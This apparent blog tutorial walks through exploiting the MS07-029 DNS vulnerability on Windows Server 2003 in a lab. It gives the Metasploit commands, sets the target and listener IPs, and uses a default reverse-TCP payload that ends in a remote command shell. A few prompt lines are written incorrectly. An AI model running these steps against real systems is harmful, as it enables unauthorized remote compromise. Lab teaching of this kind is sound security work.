Disclaimer – This tutorial is for educational purposes only.
In this post, I will show you how to hack Windows Server 2003 Using MS07_029 Vulnerability.
Requirements for this lab
- Kali Linux
- Windows Server 2003
Exploitation Steps
- Opening Metasploit
- Selecting the exploit
- Getting information about the exploit
- Setting options to run the exploit
- Running the exploit
Opening Metasploit
(kali@kali)-[~]$ msfconsole –q
(The command to execute is mentioned in bold letters, rest of the characters are console prompt). –q stands here for quiet mode that does not show the graphics when opening metasploit framework and it loads quickly.
Selecting the Exploit
Msf6>use exploit/windows/dcerpc/ms07_029_msdns_zonename
[*] No payload configured, defaulting to windows/shell/reverse_tcp
After selecting the exploit, press enter.
Getting information about the exploit
Msf6 exploit (use exploit/windows/dcerpc/ms07_029_msdns_zonename) > info
After entering info command, press enter and you will see information about this exploit. This command includes description of the exploit, options required to run this exploit and the target machines on which we can test our exploit.
Setting options to run the exploit
Msf6 exploit (use exploit/windows/dcerpc/ms07_029_msdns_zonename) > options
After entering the options command press enter. This will show you what options to set to run this exploit. Pay attention to the Required row, because these are the parameters that you must define to run this exploit. Like for this exploit, we need local IP address, remote PC IP Address.
Msf6 exploit (use exploit/windows/dcerpc/ms07_029_msdns_zonename) > set rhost 192.168.1.76
Msf6 exploit (use exploit/windows/dcerpc/ms07_029_msdns_zonename) > set lhost 192.168.1.89
After entering this command press enter. The IP I have given is of my local kali linux machine Your’s could be different. Check it using ip addr command.
Running the exploit
Msf6 exploit (use exploit/windows/dcerpc/ms07_029_msdns_zonename) > run
After entering this command press enter.
After pressing enter, the exploit will attempt to execute the payload. After execution of the payload you will see the DOS Shell.
C:\WINDOWS\system32>
You can view the video below of this lab.
You must be logged in to post a comment.